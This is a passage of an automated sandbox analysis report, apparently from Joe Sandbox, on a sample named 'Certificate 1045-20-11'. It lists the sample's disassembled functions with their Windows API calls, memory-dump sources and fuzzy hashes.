                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2326795674-1439706946
                                                                                • Opcode ID: c0c679925d3a57798548e7ad6136675de3bf4396fbdf1a60beda62391e52ad1d
                                                                                • Instruction ID: 08ef8d342d70117377b08e503c8502d985a804b4960fe9626462c61a17c1eae7
                                                                                • Opcode Fuzzy Hash: c0c679925d3a57798548e7ad6136675de3bf4396fbdf1a60beda62391e52ad1d
                                                                                • Instruction Fuzzy Hash: 4C21AB32510218BBEF159FA4CC82FEA3B79FF49724F110214FE56AB190D7B5A854CBA0
                                                                                Function 008AA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008AA941
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008AA94F
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008AA956
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: 08e033bc28108004d33c35a5fe9ebbfb88eaba73a5cf77555b79ef22b20caf64
                                                                                • Instruction ID: 08c8500c9a35c8d22a1f99881d016f2e6b468617ae4ba01a139c206526515f9c
                                                                                • Opcode Fuzzy Hash: 08e033bc28108004d33c35a5fe9ebbfb88eaba73a5cf77555b79ef22b20caf64
                                                                                • Instruction Fuzzy Hash: 502181B560060AAFEB14DF18CC91D7737ADFB5A364B050059FA14DB751CB32EC11CA61
                                                                                Function 008A99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008A9A30
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008A9A40
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008A9A65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: c2bda11b8e289672c36b7c8463ff4ed465293cb31d5595ee1f5fad70f4e66d94
                                                                                • Instruction ID: ac0036b2c24b9fa184b981c5118fab561eeef26283a7c4394c2cfec0e35aeb59
                                                                                • Opcode Fuzzy Hash: c2bda11b8e289672c36b7c8463ff4ed465293cb31d5595ee1f5fad70f4e66d94
                                                                                • Instruction Fuzzy Hash: B221B332614118BFEB218F54CC85EBB3BAAFF8A750F018129F9949B190C671AC1197A0
                                                                                Function 008AA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008AA46D
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008AA482
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008AA48F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 2e44f85cb02dfc14d4a4115b86c3acade5bb02b21f4a98b089ab94198ac2985d
                                                                                • Instruction ID: 03769b05c86864dcd9bb51e249ae370dc3ba5f0841dd88ab7835529c04383a91
                                                                                • Opcode Fuzzy Hash: 2e44f85cb02dfc14d4a4115b86c3acade5bb02b21f4a98b089ab94198ac2985d
                                                                                • Instruction Fuzzy Hash: D211C171240208BEEF245F64CC49FAB3B69FF89764F014128FA45E6491D3B2E811DB28
                                                                                Function 00862287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00862350,?), ref: 008622A1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 008622A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 2574300362-340411864
                                                                                • Opcode ID: eee1ad328ecf6ddafde639fe3765bcce61551f84469a19dff0402a3e03b84719
                                                                                • Instruction ID: d4d1e82e3c71ae643d0ad3417da4356f1fa87c4ac3b6346e7ba403322ea9c869
                                                                                • Opcode Fuzzy Hash: eee1ad328ecf6ddafde639fe3765bcce61551f84469a19dff0402a3e03b84719
                                                                                • Instruction Fuzzy Hash: 74E01A706A8700AFDB906F71EC89F243665F780716F008064B102E71A0CFB98040EF04
                                                                                Function 0086235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00862276), ref: 00862376
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0086237D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 2574300362-2819208100
                                                                                • Opcode ID: 42c183c2c5559a296264a653fa371375ff2f856b4db8bb34daa40e3857776490
                                                                                • Instruction ID: 1c20d6f4169d458c868ebc29c39c7c3582829bbe10bb8ef3fcb4033f82acbc83
                                                                                • Opcode Fuzzy Hash: 42c183c2c5559a296264a653fa371375ff2f856b4db8bb34daa40e3857776490
                                                                                • Instruction Fuzzy Hash: 51E0BDB06AC700EFDBA06F61EE0DF143A74FB85712F114468F209E22B0CBB9A400EB14
                                                                                Function 008BAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime__swprintf
                                                                                • String ID: %.3d$WIN_XPe
                                                                                • API String ID: 2070861257-2409531811
                                                                                • Opcode ID: 934e311def6e4512333addb252c65b13c93f3a2dd4d082a35b9f67880639c499
                                                                                • Instruction ID: 63235aaa9ebe9d0d0d8dcee3e7ae5b2e02145e60d72f3d41473fdc0049f0b3f4
                                                                                • Opcode Fuzzy Hash: 934e311def6e4512333addb252c65b13c93f3a2dd4d082a35b9f67880639c499
                                                                                • Instruction Fuzzy Hash: 15E0127180461CDBCB649750CD15DFA7BBCF704745F5400D2B906E1205E6359B88AA23
                                                                                Function 008442F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008442EC,?,008442AA,?), ref: 00844304
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00844316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                • Opcode ID: 2d8a9c56cf7a8468c774fc99458fc1bb91faf437977bb3cf7223fe6b07acd282
                                                                                • Instruction ID: a87e669e86d2741d0538e560944ee34bef3c56bf3749e31637d0dd09ee666352
                                                                                • Opcode Fuzzy Hash: 2d8a9c56cf7a8468c774fc99458fc1bb91faf437977bb3cf7223fe6b07acd282
                                                                                • Instruction Fuzzy Hash: 30D0A7309007169FC7205F30EC0CF11B6E4FB04701B14842AF552D2360D7B4C8808620
                                                                                Function 008A2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008A21FB,?,008A23EF), ref: 008A2213
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 008A2225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                • API String ID: 2574300362-399901964
                                                                                • Opcode ID: 4c6e0bb5051c42469920ee50c771fc932ed0f5bc4659b7a06ac00a97ad5d0563
                                                                                • Instruction ID: c76f41834f204fd25c961f63ef4cf44908a46c32535c0bee7adab94161cf1aab
                                                                                • Opcode Fuzzy Hash: 4c6e0bb5051c42469920ee50c771fc932ed0f5bc4659b7a06ac00a97ad5d0563
                                                                                • Instruction Fuzzy Hash: BCD0A7348007169FE7316F34FC08B12F6E8FB09300B14842BE862E2650D774D8808760
                                                                                Function 0084434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,008441BB,00844341,?,0084422F,?,008441BB,?,?,?,?,008439FE,?,00000001), ref: 00844359
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0084436B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                • Opcode ID: 277d030f9b90e4f528532dfa8d6c9719e129b63daf322b081fd267dab5c1b4ab
                                                                                • Instruction ID: 5ae9cb46a12460c10a6b99d4243656af84118510990b14ef51b9cf0e65ddd4e0
                                                                                • Opcode Fuzzy Hash: 277d030f9b90e4f528532dfa8d6c9719e129b63daf322b081fd267dab5c1b4ab
                                                                                • Instruction Fuzzy Hash: ACD0A7309007169FC7205F30EC09F11B6E4FB10B19B24C42AE491D2350D7B4D8808610
                                                                                Function 00880539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,0088051D,?,008805FE), ref: 00880547
                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00880559
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1071820185
                                                                                • Opcode ID: c5f8f57873414468e5a4f56949313f27a0bf3bcf9534ddebca780aff9641a34f
                                                                                • Instruction ID: 1ebd936cc4f0980339987d6341c566078835066986cee8df89fc9890f92ce36f
                                                                                • Opcode Fuzzy Hash: c5f8f57873414468e5a4f56949313f27a0bf3bcf9534ddebca780aff9641a34f
                                                                                • Instruction Fuzzy Hash: CDD0A7308107129FC730BF30EC08A11B7F4FB00301B14C42EE466E2250DA74D8848F20
                                                                                Function 00880564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0088052F,?,008806D7), ref: 00880572
                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00880584
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1587604923
                                                                                • Opcode ID: ebe45005020aefc646bc7ade7301c1b7541577254a70e315ee27529d48098a97
                                                                                • Instruction ID: 17dafb60d2ddd62a1c8d4a3e925f784110b7150acc9034c341ef0b111afde659
                                                                                • Opcode Fuzzy Hash: ebe45005020aefc646bc7ade7301c1b7541577254a70e315ee27529d48098a97
                                                                                • Instruction Fuzzy Hash: 27D052304107229EC7307F30A808A12BBF8FB04300B14842AE9A1E2A54EAB4C8848F20
                                                                                Function 0089ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0089ECBE,?,0089EBBB), ref: 0089ECD6
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0089ECE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                • API String ID: 2574300362-1816364905
                                                                                • Opcode ID: 7860015020fbb3258af37d55244bf6e81c772187abd6d8ccaeadd4464259a280
                                                                                • Instruction ID: 7c7d58e4aa7c50c27d3d54b9b5be44139520c4cdce249adb9d65c6325ef485f0
                                                                                • Opcode Fuzzy Hash: 7860015020fbb3258af37d55244bf6e81c772187abd6d8ccaeadd4464259a280
                                                                                • Instruction Fuzzy Hash: 1AD0A7308107239FCF20BF70EC48A12BAF4FB00304B18882BF895E2251DB74C8808610
                                                                                Function 0089BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0089BAD3,00000001,0089B6EE,?,008DDC00), ref: 0089BAEB
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0089BAFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: 78343cd27eeac8f45446a044be2d5daee20100b1dcf96a660ef14628a9384651
                                                                                • Instruction ID: 6a9cb2c3cbadd0c82af932cc21343c1260c12cb3e5b8c61e81956eecb22bffba
                                                                                • Opcode Fuzzy Hash: 78343cd27eeac8f45446a044be2d5daee20100b1dcf96a660ef14628a9384651
                                                                                • Instruction Fuzzy Hash: 13D05E308007129FCB306F30B848A22B6E4FB00310B18842AA953E2294DB74C884CA10
                                                                                Function 008A3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,008A3BD1,?,008A3E06), ref: 008A3BE9
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008A3BFB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                • Opcode ID: f26d55fe3d7fe3d59d82ad93de7ce8366e264e588631deeaebf60e324f7207b7
                                                                                • Instruction ID: 57a4d53d05cefe2a2087189be327a5dea1e74f4694ce2b234006f6edca320a0c
                                                                                • Opcode Fuzzy Hash: f26d55fe3d7fe3d59d82ad93de7ce8366e264e588631deeaebf60e324f7207b7
                                                                                • Instruction Fuzzy Hash: 3FD0A7704007169FE7206F70EC09A13FAF4FB13324B14842BF455E2650D6BCC4808E10
                                                                                Function 00879B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e298fdabde920e6e105026fb1a818f3f8c695e03746cc648263143e5279e9db6
                                                                                • Instruction ID: 6da3d0f1991bcc6af0d8f6bfb4eb707268e2220ea9a6a04d1eb38b54547a0d0d
                                                                                • Opcode Fuzzy Hash: e298fdabde920e6e105026fb1a818f3f8c695e03746cc648263143e5279e9db6
                                                                                • Instruction Fuzzy Hash: 79C15C75A0021AEFDB14CF94C884EAEBBB5FF88704F108598E949EB255D770DE81DB90
                                                                                Function 0089AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0089AAB4
                                                                                • CoUninitialize.OLE32 ref: 0089AABF
                                                                                  • Part of subcall function 00880213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0088027B
                                                                                • VariantInit.OLEAUT32(?), ref: 0089AACA
